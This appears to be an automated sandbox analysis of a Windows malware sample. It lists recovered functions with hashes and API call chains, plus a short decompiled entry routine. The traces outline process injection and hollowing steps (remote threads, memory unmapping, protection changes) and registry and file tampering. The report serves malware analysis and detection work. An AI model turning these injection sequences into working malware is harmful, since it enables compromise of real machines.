  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
